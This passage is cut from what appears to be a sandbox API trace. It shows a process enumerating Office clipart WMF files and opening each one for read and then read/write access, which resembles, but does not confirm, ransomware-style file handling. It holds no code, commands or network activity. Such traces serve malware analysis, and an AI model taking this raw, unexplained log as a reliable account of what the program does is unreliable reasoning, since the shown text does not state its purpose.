Context=0x0) returned 1 [0100.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0100.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.964] AreFileApisANSI () returned 1 [0100.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a2d0 [0100.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8a2d0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 69 [0100.964] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.017] GetFileType (hFile=0x368) returned 0x1 [0101.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0101.017] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.017] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.018] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.018] CloseHandle (hObject=0x368) returned 1 [0101.034] AreFileApisANSI () returned 1 [0101.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0101.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 69 [0101.034] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.034] GetFileType (hFile=0x368) returned 0x1 [0101.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0101.034] CloseHandle (hObject=0x368) returned 1 [0101.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0101.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0101.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0101.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0101.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.055] AreFileApisANSI () returned 1 [0101.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0101.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 69 [0101.055] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1634)) returned 1 [0101.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0101.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0101.055] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0101.056] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.056] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.056] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5062, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN00853_.WMF", cAlternateFileName="")) returned 1 [0101.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0101.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0101.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0101.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0101.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0101.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0101.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0101.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0101.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0101.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0101.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a498 [0101.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0101.056] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.056] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.056] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.056] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0101.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.056] AreFileApisANSI () returned 1 [0101.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0101.057] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.057] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0101.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0101.057] AreFileApisANSI () returned 1 [0101.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0101.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 69 [0101.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.057] GetFileType (hFile=0x368) returned 0x1 [0101.057] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0101.058] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.058] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.058] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.058] CloseHandle (hObject=0x368) returned 1 [0101.058] AreFileApisANSI () returned 1 [0101.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0101.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 69 [0101.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.058] GetFileType (hFile=0x368) returned 0x1 [0101.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0101.059] CloseHandle (hObject=0x368) returned 1 [0101.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0101.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0101.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0101.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0101.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0101.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0101.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.060] AreFileApisANSI () returned 1 [0101.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0101.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 69 [0101.060] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5062)) returned 1 [0101.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0101.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0101.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0101.060] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.060] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.060] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a50, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN00914_.WMF", cAlternateFileName="")) returned 1 [0101.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0101.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0101.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0101.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0101.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0101.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0101.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0101.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.061] RtlAllocateHeap (HeapHandle=0x20000, 